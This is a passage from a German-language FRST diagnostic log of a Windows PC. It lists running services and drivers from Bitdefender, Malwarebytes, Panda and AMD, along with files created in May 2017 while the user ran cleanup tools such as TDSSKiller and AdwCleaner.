R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [113592 2017-05-23] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-05-23] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-23] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [93624 2017-05-23] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-23 18:33 - 2017-05-23 18:33 - 00019150 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-23 18:27 - 2017-05-23 18:31 - 00002088 _____ C:\Users\Dino\Desktop\SystemLook.txt
2017-05-23 18:27 - 2017-05-23 18:26 - 00165376 _____ C:\Users\Dino\Desktop\SystemLook_x64.exe
2017-05-23 18:23 - 2017-05-23 18:24 - 00025577 _____ C:\Users\Dino\Desktop\Fixlog.txt
2017-05-23 18:23 - 2017-05-23 18:23 - 00000000 ____D C:\Users\Dino\Desktop\FRST-OlderVersion
2017-05-23 17:48 - 2017-05-23 17:48 - 00000000 ___HD C:\OneDriveTemp
2017-05-22 18:25 - 2017-05-23 18:33 - 00093624 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00113592 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00187320 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 18:25 - 2017-05-09 16:37 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-05-22 18:15 - 2017-05-22 18:10 - 04102600 _____ C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
2017-05-22 18:13 - 2017-05-23 18:18 - 00000000 ____D C:\AdwCleaner
2017-05-21 21:26 - 2017-05-21 21:31 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.26.49_log.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-23 18:23 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-23 18:33 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
